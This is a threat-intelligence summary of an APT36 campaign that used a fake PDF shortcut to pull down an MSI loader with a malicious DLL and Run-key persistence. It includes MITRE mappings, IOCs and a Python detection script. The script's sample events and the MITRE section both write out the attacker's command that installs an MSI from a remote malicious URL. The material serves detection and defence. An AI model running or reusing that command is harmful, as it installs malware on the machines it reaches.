APT36 LNK-BASED MALWARE CAMPAIGN LEVERAGING MSI PAYLOAD DELIVERY

CYFIRMA analyzed a targeted APT-36 campaign that used a malicious Windows shortcut masquerading as a government advisory PDF to retrieve an MSI installer which deployed a .NET loader, malicious DLLs (including wininet.dll), dropped a decoy PDF, and established registry-run persistence via an HTA. Although the C2 domain wmiprovider[.]com was inactive during analysis, the loader contains obfuscated HTTP endpoints that enable remote command execution and long-term access. #APT36 #NCERT_Whatsapp_Advisory

Keypoints

  • Initial access was achieved via a malicious Windows shortcut (NCERT-Whatsapp-Advisory.pdf.lnk) disguised as a PDF to trick users into execution.
  • The shortcut runs an obfuscated cmd.exe/msiexec command to download and install an MSI payload hosted on aeroclubofindia.co.in.
  • The MSI contains a .NET loader (ConsoleApp1.exe) that drops a decoy PDF, malicious DLLs (including wininet.dll), and additional executables to C:\ProgramData.
  • Persistence is implemented by creating PcDirvs.hta which uses embedded VBScript to add PcDirvs.exe to the Windows Run registry key for startup execution.
  • The malicious wininet.dll contains a hardcoded C2 domain (wmiprovider[.]com) and implements reversed, obfuscated HTTP GET endpoints (/retsiger, /taebtraeh, /dnammoc_teg, /dnammocmvitna) for beaconing and remote command retrieval.
  • The malware performs system and security reconnaissance (antivirus and anti-VM checks) and supports arbitrary remote command execution via cmd.exe, enabling follow-on payloads and long-term control.
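As an added illustration of the host-side chain in the keypoints above (this is example code, not anything from the CYFIRMA report), the following Python runs a few detection rules over constructed Sysmon-style process-creation and registry events: it undoes cmd.exe caret escaping before matching, flags msiexec installs pulled from a URL, flags mshta launched from ProgramData, and flags Run-key values that point into ProgramData. The event field names, the caret positions in the sample command line, the paths under C:\ProgramData\PcDirvs and the Run-key value name are assumptions; the msiexec URL is the one the report gives, with defanging removed.

```python
import re

# ---- rules ---------------------------------------------------------------

def strip_caret_escapes(cmdline: str) -> str:
    """Undo cmd.exe caret escaping ('^x' -> 'x'), so 'msi^exec' reads 'msiexec'.
    A doubled caret '^^' is cmd's literal caret and collapses to one '^'."""
    return re.sub(r"\^(.)", r"\1", cmdline)

def is_double_extension_lnk(filename: str) -> bool:
    """True for names like 'advisory.pdf.lnk' that pose as documents."""
    return re.search(r"\.(pdf|docx?|xlsx?)\.lnk$", filename, re.IGNORECASE) is not None

# msiexec (or msiexec.exe) followed somewhere by an install switch and an http(s) URL
MSIEXEC_REMOTE = re.compile(
    r"\bmsiexec(?:\.exe)?\b.*?\s[/-](?:i|package)\s+https?://", re.IGNORECASE)
# any ...\CurrentVersion\Run\ or RunOnce\ value
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)

def detect_event(event: dict) -> list[str]:
    """Return the names of every rule the event trips (empty list if none)."""
    findings = []
    if event["type"] == "process_create":
        raw = event["command_line"]
        clean = strip_caret_escapes(raw)
        if clean != raw:
            findings.append("caret_obfuscation")
        if MSIEXEC_REMOTE.search(clean):
            findings.append("msiexec_remote_install")
        if event["image"].lower().endswith("\\mshta.exe") and "\\programdata\\" in clean.lower():
            findings.append("hta_from_programdata")
    elif event["type"] == "registry_set":
        if RUN_KEY.search(event["target"]) and "\\programdata\\" in event["data"].lower():
            findings.append("run_key_points_to_programdata")
    return findings

def scan(events: list[dict]) -> list[list[str]]:
    return [detect_event(e) for e in events]

# ---- constructed sample events (assumed layout; not from the report) -------

SAMPLE_EVENTS = [
    {   # the shortcut's launcher; caret placement is assumed, URL is the reported one
        "type": "process_create",
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r"C:\Windows\System32\cmd.exe /c msi^exec.exe /q /^i "
                        r"https://aeroclubofindia.co.in/css/NCERT-Whatsapp-Advisory/winc",
    },
    {   # benign local install for contrast
        "type": "process_create",
        "image": r"C:\Windows\System32\msiexec.exe",
        "parent_image": r"C:\Windows\System32\msiexec.exe",
        "command_line": r"msiexec.exe /i C:\Users\user\Downloads\installer.msi /quiet",
    },
    {   # HTA launched from ProgramData (path under PcDirvs is an assumption)
        "type": "process_create",
        "image": r"C:\Windows\System32\mshta.exe",
        "parent_image": r"C:\ProgramData\PcDirvs\ConsoleApp1.exe",
        "command_line": r"mshta.exe C:\ProgramData\PcDirvs\PcDirvs.hta",
    },
    {   # Run-key persistence written by the HTA's VBScript (value name assumed)
        "type": "registry_set",
        "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PcDirvs",
        "data": r"C:\ProgramData\PcDirvs\PcDirvs.exe",
    },
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(event["type"], hits)
```

The caret rule is deliberately separate from the msiexec rule: an analyst can tune the msiexec match on de-obfuscated text and still keep "the command line needed de-escaping at all" as its own signal.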

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Used to deliver a malicious .lnk file disguised as a PDF to initiate infection (‘Uses deceptive shortcut (.lnk) files masquerading as legitimate PDF advisories to trick victims into executing malicious code.’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Listed as an execution technique in the report; the campaign uses command interpreters to run obfuscated commands (relevant execution example: ‘C:\Windows\System32\cmd.exe /c msiexec.exe /q /i https[:]//aeroclubofindia[.]co[.]in/css/NCERT-Whatsapp-Advisory/winc’).
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence achieved by HTA-created VBScript that adds PcDirvs.exe to the Windows Run registry key (‘creates a malicious PcDirvs.hta file containing an embedded VBScript that adds PcDirvs.exe to the Windows Run registry key’).
  • [T1027] Obfuscated Files or Information – Obfuscation used across the campaign to evade detection, including caret insertion and reversed endpoint strings (‘employs command-line obfuscation and encoded MSI-based delivery to evade casual inspection and static detection.’).
  • [T1027.002] Software Packing – Payloads are embedded within the MSI and delivered as packaged components (‘The MSI file contains embedded components, ConsoleApp1.exe, along with a DLL file.’).
  • [T1027.009] Embedded Payloads – MSI contains embedded executables and DLLs decoded at runtime (‘The MSI file contains embedded components, ConsoleApp1.exe, along with a DLL file.’).
  • [T1564.003] Hidden Window – Execution and launcher operate in hidden mode to reduce visibility (‘The shortcut executes an obfuscated command using cmd.exe in hidden mode.’ / ‘The HTA is launched with windowsStyle.Hidden’).
  • [T1574.001] Hijack Execution Flow: DLL – DLL hijacking used to intercept execution flow via a malicious wininet.dll (‘Deploys a malicious wininet.dll to intercept execution flow and establish command-and-control functionality.’).
  • [T1087] Account Discovery – The malware conducts reconnaissance of the victim environment, consistent with account and environment discovery (‘System and Security Reconnaissance: Collects information about the victim environment, including installed antivirus products and anti-VM status.’).
  • [T1217] Browser Information Discovery – Listed in the mapping as a reconnaissance capability to gather environment details (‘Browser Information Discovery’).
  • [T1083] File and Directory Discovery – The loader drops and enumerates files and directories to place payloads in ProgramData and other locations (‘decodes and writes a DLL file to: C:\ProgramData\PcDirvs\pdf.dll’).
  • [T1082] System Information Discovery – The malware collects system-level details and AV/anti-VM status to inform behavior (‘Collects information about the victim environment, including installed antivirus products and anti-VM status.’).
  • [T1005] Data from Local System – The toolkit supports collection of local system data for exfiltration or reconnaissance (‘Collects information about the victim environment…’ and drops/reads local files such as the decoy PDF and dropped executables).
  • [T1071.004] Application Layer Protocol: DNS – Mapped in the report as a C2 channel technique, while the DLL actually implements obfuscated HTTP GET–based endpoints to communicate with C2 (‘The DLL implements multiple HTTP GET–based endpoints to establish communication with the C2 server…’).
  • [T1041] Exfiltration Over C2 Channel – The C2 mechanism supports retrieval of commands and could be used for exfiltration over the established channel (‘Retrieves attacker-issued commands from the server and executes them via: “cmd.exe /c ”, enabling the threat actor to remotely run arbitrary commands…’).
  • [T1485] Data Destruction – Listed as an impact technique in the report’s MITRE mapping (report lists ‘Data Destruction’ as an impact mapping).

Indicators of Compromise

  • [URL] MSI downloader – https[:]//aeroclubofindia[.]co[.]in/css/NCERT-Whatsapp-Advisory/winc
  • [Domain] C2 and hosting – wmiprovider[.]com (hardcoded C2 in wininet.dll), aeroclubofindia[.]co[.]in (MSI host)
  • [SHA256] File hashes observed – bbcbce9a08d971a4bbcd9a0af3576f1e0aa0dad1b3cf281c139b7a8dd8147605 (NCERT-Whatsapp-Advisory.pdf.lnk), 4dd9e2085297515825416415413eae1c9632392cb159ac70e459d0ebeb2dd49d (wininet.dll), and 3 more hashes.
  • [File Name] Dropped and decoy files – NCERT-Whatsapp-Advisory.pdf.lnk, NCERT-Whatsapp-Advisory.pdf, and other names including PcDirvs.hta and nikmights.msi.
  • [HTA/Script] Persistence artifact – PcDirvs.hta (HTA with embedded VBScript used to add PcDirvs.exe to Run registry key).
  • [HTTP Endpoints] Obfuscated C2 paths (reversed) – /retsiger (register), /taebtraeh (heartbeat), /dnammoc_teg (get_command) used by the DLL for communication and command retrieval.
  • [Strings / Identifiers] Hardcoded unique strings observed – ffce827bd99b5e68fc04103f06ce489458, nnb5dc76007c20b4ea51f14290262d1 (used as embedded identifiers/UIDs in payloads).
Read more: https://www.cyfirma.com/research/apt36-lnk-based-malware-campaign-leveraging-msi-payload-delivery/